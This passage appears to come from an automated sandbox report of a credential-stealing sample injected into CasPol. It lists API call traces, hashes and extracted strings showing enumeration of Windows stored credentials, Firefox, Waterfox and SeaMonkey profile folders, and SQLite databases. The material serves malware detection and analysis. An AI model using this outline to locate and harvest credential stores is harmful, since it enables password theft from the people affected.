                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 697348961-0
                                                                                                                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                              • API String ID: 3527940856-11920434
                                                                                                                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                              • API String ID: 3527940856-2068335096
                                                                                                                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                              • API String ID: 3527940856-3369679110
                                                                                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                              • String ID: $0.@
                                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2941347001-0
                                                                                                                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                              • API String ID: 3249829328-1174173950
                                                                                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 669240632-0
                                                                                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                              • String ID: "%s"
                                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                              • API String ID: 1714573020-3385500049
                                                                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2911713577-0
                                                                                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp
                                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                              • API String ID: 2705122986-2036018995
                                                                                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
